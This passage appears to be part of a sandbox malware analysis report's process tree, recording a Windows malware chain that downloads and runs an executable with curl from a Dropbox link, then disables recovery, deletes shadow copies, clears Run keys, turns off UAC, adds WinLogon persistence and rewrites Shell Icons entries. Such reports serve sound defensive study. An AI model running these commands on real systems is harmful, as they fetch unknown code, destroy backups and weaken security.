      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8146.tmp\8147.tmp\8148.bat C:\ProgramData\Drivers\Start.exe"
      4⤵
      PID:1632
    - - C:\ProgramData\Drivers\curl.exe
        
        C:\ProgramData\Drivers\Curl.exe -L -o "C:\ProgramData\Drivers\Driver.exe" "https://www.dropbox.com/s/kws6z5mk9d0t52b/HD0Killer0Clown02.6.exe?dl=1"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3372
    - - C:\ProgramData\Drivers\Driver.exe
        
        "C:\ProgramData\Drivers\Driver.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1608
      - C:\java\protection\clown.exe
        
        "C:\java\protection\clown.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1600
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C66D.tmp\C66E.tmp\C66F.bat C:\java\protection\clown.exe"
        7⤵
        
        PID:2788
        
        C:\java\protection\start\startban.exe
        
        C:\java\protection\start\startban.exe
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1276
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C719.tmp\C71A.tmp\C71B.bat C:\java\protection\start\startban.exe"
        9⤵
        
        PID:3040
        
        C:\java\ban\ban.exe
        
        C:\java\ban\ban.exe
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:744
        
        C:\java\ban\ban.exe
        
        C:\java\ban\ban.exe
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:248
        
        C:\java\protection\def.exe
        
        C:\java\protection\def.exe
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1328
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C709.tmp\C70A.tmp\C70B.bat C:\java\protection\def.exe"
        9⤵
        
        PID:4132
        
        C:\java\protection\DisDef.exe
        
        C:\java\protection\DisDef.exe /D
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4264
        
        C:\java\protection\start\startcur.exe
        
        C:\java\protection\start\startcur.exe
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1736
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C70A.tmp\C70A.tmp\C70B.bat C:\java\protection\start\startcur.exe"
        9⤵
        
        PID:4532
        
        C:\java\ban\cur.exe
        
        C:\java\ban\cur.exe
        10⤵
        Executes dropped EXE
        
        PID:3020
        
        C:\java\protection\start\startkey.exe
        
        C:\java\protection\start\startkey.exe
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2404
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C728.tmp\C729.tmp\C72A.bat C:\java\protection\start\startkey.exe"
        9⤵
        
        PID:2224
        
        C:\java\ban\key.exe
        
        C:\java\ban\key.exe
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4736
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C9F7.tmp\C9F8.tmp\C9F9.bat C:\java\ban\key.exe"
        11⤵
        
        PID:4664
        
        C:\Windows\system32\reg.exe
        
        reg import C:\java\ban\key.reg
        12⤵
        
        PID:3792
        
        C:\Windows\system32\ReAgentc.exe
        
        reagentc /disable
        8⤵
        Drops file in System32 directory
        Drops file in Windows directory
        
        PID:2364
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic shadowcopy delete /nointeractive
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2104
        
        C:\java\zip\7z.exe
        
        C:\java\zip\7z.exe a -tzip -mx1 -r0 C:\ProgramData\WindowsVersion\archive.zip C:\java
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:980
        
        C:\java\protection\start\startdelstartup.exe
        
        C:\java\protection\start\startdelstartup.exe
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3020
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DB3D.tmp\DB3E.tmp\DB3F.bat C:\java\protection\start\startdelstartup.exe"
        9⤵
        
        PID:2112
        
        C:\java\protection\delstartup.exe
        
        C:\java\protection\delstartup.exe
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5320
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DE69.tmp\DE6A.tmp\DE6B.bat C:\java\protection\delstartup.exe"
        11⤵
        
        PID:5484
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /va /f
        12⤵
        
        PID:5640
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /va /f
        12⤵
        
        PID:5660
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run" /va /f
        12⤵
        
        PID:6028
        
        C:\java\protection\start\startuac.exe
        
        C:\java\protection\start\startuac.exe
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2600
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DAA1.tmp\DAB1.tmp\DAB2.bat C:\java\protection\start\startuac.exe"
        9⤵
        
        PID:4876
        
        C:\java\protection\uac.exe
        
        C:\java\protection\uac.exe
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5144
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DD7F.tmp\DD80.tmp\DD81.bat C:\java\protection\uac.exe"
        11⤵
        
        PID:5412
        
        C:\Windows\system32\reg.exe
        
        reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        12⤵
        UAC bypass
        Modifies registry key
        
        PID:5628
        
        C:\java\protection\start\startauto.exe
        
        C:\java\protection\start\startauto.exe
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2364
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DAB0.tmp\DAB1.tmp\DAB2.bat C:\java\protection\start\startauto.exe"
        9⤵
        
        PID:5000
        
        C:\java\protection\auto.exe
        
        C:\java\protection\auto.exe
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5136
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DD6F.tmp\DD70.tmp\DD71.bat C:\java\protection\auto.exe"
        11⤵
        Drops startup file
        
        PID:5384
        
        C:\java\protection\start\startWinlog.exe
        
        C:\java\protection\start\startWinlog.exe
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3040
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DAFE.tmp\DAFF.tmp\DB00.bat C:\java\protection\start\startWinlog.exe"
        9⤵
        
        PID:4392
        
        C:\java\protection\Winlog.exe
        
        C:\java\protection\Winlog.exe
        10⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        
        PID:5888
        
        C:\java\protection\start\startExplorerIcons.exe
        
        C:\java\protection\start\startExplorerIcons.exe
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3792
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DB1E.tmp\DB1F.tmp\DB20.bat C:\java\protection\start\startExplorerIcons.exe"
        9⤵
        
        PID:4492
        
        C:\java\protection\ExplorerIcons.exe
        
        C:\java\protection\ExplorerIcons.exe
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5256
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DDEC.tmp\DDFD.tmp\DDFE.bat C:\java\protection\ExplorerIcons.exe"
        11⤵
        
        PID:5492
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 1 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5776
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 2 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5840
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 3 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5436
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 4 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5572
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 5 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5960
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 6 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3400
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 7 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5552
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 8 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5764
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 9 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:2600
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 10 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:320
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 11 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5400
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 12 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5468
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 13 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5296
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 14 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5812
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 15 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5484
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 16 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5364
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 17 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5236
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 18 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:1732
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 19 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:4736
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 20 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:1064
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 21 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:6048
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 22 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5996
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 23 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5572
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 24 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:6052
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 25 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:4252
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 26 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5960
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 27 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:1852
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 28 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:6128
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 29 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies Shortcut Icons
        
        PID:380
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 30 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5868
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 31 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:2972
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 32 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5448
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 33 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5988
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 34 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5388
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 35 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3004
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 36 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3400
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 37 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:6012
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 38 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3780
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 39 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5380
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 40 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:2364
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 41 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:4876
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 42 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:2168
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 43 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:4252
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 44 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:1788
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 45 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:1032
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 46 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5736
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 47 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:6004
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 48 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5160
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 49 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5564
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 50 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5244
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 51 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:380
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 52 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:2372
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 53 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5460
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 54 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5992
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 55 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5024
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 56 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5420
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 57 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3548
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 58 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:2268
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 59 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:1668
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 60 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5176
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 61 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:1632
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 62 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5360
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 63 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:4100
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 64 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:320
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 65 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:4284
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 66 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:2440
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 67 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:2528
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 68 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:900
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 69 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:4556
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 70 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5284
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 71 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:1428
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 72 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:6036
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 73 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:3480
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 74 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5228
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 75 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5856
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 76 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5744
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 77 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:2148
        
        C:\Windows\system32\reg.exe
        
